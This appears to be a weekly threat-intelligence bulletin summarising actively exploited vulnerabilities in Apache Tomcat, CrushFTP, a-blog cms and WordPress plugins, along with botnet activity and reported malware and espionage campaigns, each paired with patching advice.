Executive Summary
This week saw significant cybersecurity developments, with both newly discovered and previously known critical vulnerabilities under active exploitation. Recent additions to the CISA KEV catalog include severe flaws in Apache Tomcat and CrushFTP, both actively targeted in the wild. WordPress plugins continue to pose a high risk, with critical issues in Bricks Builder, ValvePress Automatic, Startklar Elementor Addons, and GiveWP Donation Plugin leading to remote code execution, SQL injection, and unauthorized access. a-blog cms is also being actively exploited through an untrusted deserialization flaw affecting both supported and legacy versions. Immediate patching is strongly recommended across all impacted systems
Meanwhile, botnet activity surged, as EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeted Cloud Gateway, GitLab, and PHP vulnerabilities, while Bashlite, BrickerBot, Tsunami, and Mirai ramped up attacks on IoT devices, particularly Eir D1000 modems.
CISA published an analysis of RESURGE, a newly discovered malware variant targeting Ivanti Connect Secure appliances, featuring persistence mechanisms, credential theft, and privilege escalation. Kaspersky exposed a state-sponsored cyber-espionage campaign dubbed Operation ForumTroll, which exploited a zero-day vulnerability in Google Chrome to deliver malware via phishing emails to Russian media and academic institutions. Trend Micro detailed another espionage operation by the Water Gamayun threat group, leveraging a flaw in Microsoft’s Management Console to deploy an advanced malware toolkit for data theft and long-term system compromise.
Meanwhile, Elastic Security Labs examined the OUTLAW Linux malware, which uses simple yet effective SSH brute-force attacks and persistence tactics to establish and grow a botnet. These developments highlight the continued advancement of attacker techniques and the urgent need for proactive patching, phishing mitigation, and comprehensive endpoint protection.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.
A critical path equivalence vulnerability in Apache Tomcat versions 11.0.0-M1 through 11.0.2, 10.1.0-M1 through 10.1.34, and 9.0.0.M1 through 9.0.98. The flaw stems from improper handling of file paths containing internal dots, which can allow unauthenticated remote attackers to execute arbitrary code, access sensitive files, or inject malicious content under certain non-default configurations. With a CVSS v3 base score of 9.8, this vulnerability is classified as critical. Public proof-of-concept exploits are available, and active exploitation has been observed in the wild, prompting its inclusion in CISA’s Known Exploited Vulnerabilities (KEV) catalog. Administrators are strongly urged to upgrade to Apache Tomcat versions 11.0.3, 10.1.35, or 9.0.99 to mitigate the risk.
A critical authentication bypass vulnerability affects CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0, caused by improper handling of S3 authorization headers. This flaw allows remote, unauthenticated attackers to impersonate users—including administrators—and perform privileged actions such as data access and administrative operations. With a CVSS score of 9.8, the vulnerability is classified as highly severe. A public proof-of-concept (PoC) exploit is available, and active exploitation has been observed in the wild. Users are strongly urged to update to CrushFTP version 10.8.4 or 11.3.1
A critical untrusted data deserialization vulnerability has been discovered in a-blog cms, a content management system developed by Appleple Inc., which allows attackers to upload arbitrary files to the server via specially crafted requests—potentially resulting in remote script execution and full server compromise. Assigned a CVSS v3 base score of 7.5, this high-severity vulnerability has been actively exploited in the wild, particularly targeting versions 2.8.x and later, although unsupported versions 2.7 and earlier are also affected. It’s crucial to note that, “according to the developer, a-blog cms Ver.2.7 and earlier versions, which are now unsupported, are affected as well.The primary mitigation is to update a-blog cms to the latest patched release as advised by the developer, as applying the official fix is essential to preventing further exploitation and securing affected systems.
CVE-2024-25600 is a critical unauthenticated remote code execution (RCE) vulnerability in the Bricks Builder theme for WordPress, affecting versions up to and including 1.9.6. This flaw allows attackers to execute arbitrary PHP code on the server without authentication, potentially leading to full site compromise. The vulnerability has been assigned a CVSS v3 base score of 10.0, indicating its high severity. Public exploitation is available, and active exploitation has been observed in the wild. Administrators are strongly advised to update to version 1.9.6.1 or later to mitigate this issue.
A critical SQL Injection vulnerability has been identified in the ValvePress Automatic plugin for WordPress, affecting versions up to and including 3.92.0. This flaw allows unauthenticated attackers to execute arbitrary SQL queries, which can lead to unauthorized access, data exfiltration, or the creation of rogue administrative accounts. Assigned a CVSS v3.1 base score of 9.8, the vulnerability is considered highly severe. Active exploitation has been reported in the wild, with attackers leveraging the flaw to compromise WordPress sites. proof-of-concept (PoC) code available in public, further increasing the risk of widespread abuse. Users are strongly urged to upgrade to version 3.92.1 or later, which includes the necessary security patch to mitigate this vulnerability.
A critical vulnerability in the Startklar Elementor Addons plugin for WordPress, affecting versions up to and including 1.7.13, arises from insufficient file type validation in the process function of the startklarDropZoneUploadProcess class, allowing unauthenticated attackers to upload arbitrary files to the server, potentially leading to remote code execution. The National Vulnerability Database (NVD) has assigned it a CVSS v3.1 base score of 9.8, classifying it as critical. Although no public proof-of-concept (PoC) is available, the vulnerability is reportedly being actively exploited in the wild. Users are strongly advised to update to version 1.7.14 or later to mitigate the risk.
A critical code injection vulnerability in the GiveWP – Donation Plugin and Fundraising Platform for WordPress, affecting versions up to and including 3.16.1. This flaw arises from the deserialization of untrusted input via parameters such as 'give_title' and 'card_address', allowing unauthenticated attackers to inject PHP objects. The presence of a Property-Oriented Programming (POP) chain further enables attackers to delete arbitrary files and achieve remote code execution. The National Vulnerability Database (NVD) has assigned this vulnerability a CVSS v3.1 base score of 9.8, categorizing it as critical. While version 3.16.1 addressed the issue partially, comprehensive hardening was implemented in version 3.16.2. Users are strongly advised to update to version 3.16.2 or later to mitigate this vulnerability.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned. As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.
Vulnerabilities abused by Botnet
Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.
The Cybersecurity and Infrastructure Security Agency (CISA) has released a Malware Analysis Report detailing a new malware variant, RESURGE, linked to the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE shares functionalities with the SPAWNCHIMERA malware, including persistence across reboots, but introduces unique commands that create web shells, manipulate integrity checks, and modify files. These capabilities enable credential harvesting, unauthorized account creation, password resets, and privilege escalation.
Kaspersky's Global Research and Analysis Team (Great) has uncovered a state-sponsored APT attack, dubbed Operation ForumTroll, which exploits a zero-day vulnerability, CVE-2024-2783, in Google Chrome to conduct cyber-espionage against Russian media professionals and academic institutions. attack begins with phishing emails impersonating invitations to the Primakov Readings forum, containing malicious links that redirect victims to an attacker-controlled website. If a Windows PC user with Google Chrome or any Chromium-based browser clicks the link, malware is deployed automatically, requiring no further action from the victim. The CVE-2025-2783 vulnerability, a logic flaw between Chrome and the Windows operating system, enables sandbox protection bypass, allowing attackers to execute remote code. Kaspersky reported the flaw to Google, which swiftly released a patch. Given the highly targeted nature of the attack, organizations are urged to immediately apply the latest Chrome security update and strengthen their phishing defenses to mitigate the risk.
Trend Micro Research has uncovered a cyber-espionage campaign orchestrated by the Russian threat actor Water Gamayun (also known as EncryptHub and Larva-208), which exploits a zero-day vulnerability, CVE-2025-26633 in the Microsoft Management Console (MMC) framework to execute malicious code. Dubbed MSC EvilTwin, this attack technique manipulates .mscfiles and the Multilingual User Interface Path (MUIPath) to download and execute malicious payloads, establish persistence and exfiltrate sensitive data from compromised systems. This vulnerability allows attackers to infiltrate target environments using a sophisticated arsenal of malware, including the EncryptHub stealer, DarkWisp backdoor, SilentPrism backdoor, MSC EvilTwin loader, Stealc and Rhadamanthys stealer.
The Elastic Security Labs blog post titled Outlaw Linux Malware Persistent, Unsophisticated, and Surprisingly Effective" examines OUTLAW, a persistent Linux-based malware that utilizes basic yet effective techniques to establish and maintain a botnet. The malware initiates attacks through SSH brute-force methods, targeting systems with weak credentials. Once access is gained, it deploys components such as a modified XMRig cryptocurrency miner, an IRC-based remote-control tool named STEALTH SHELLBOT, and a custom brute-force tool called BLITZ. OUTLAW ensures persistence by eliminating competing malware and establishing mechanisms like SSH key manipulation and cron job scheduling. Additionally, it propagates by using compromised hosts to launch further SSH brute-force attacks within local subnets.
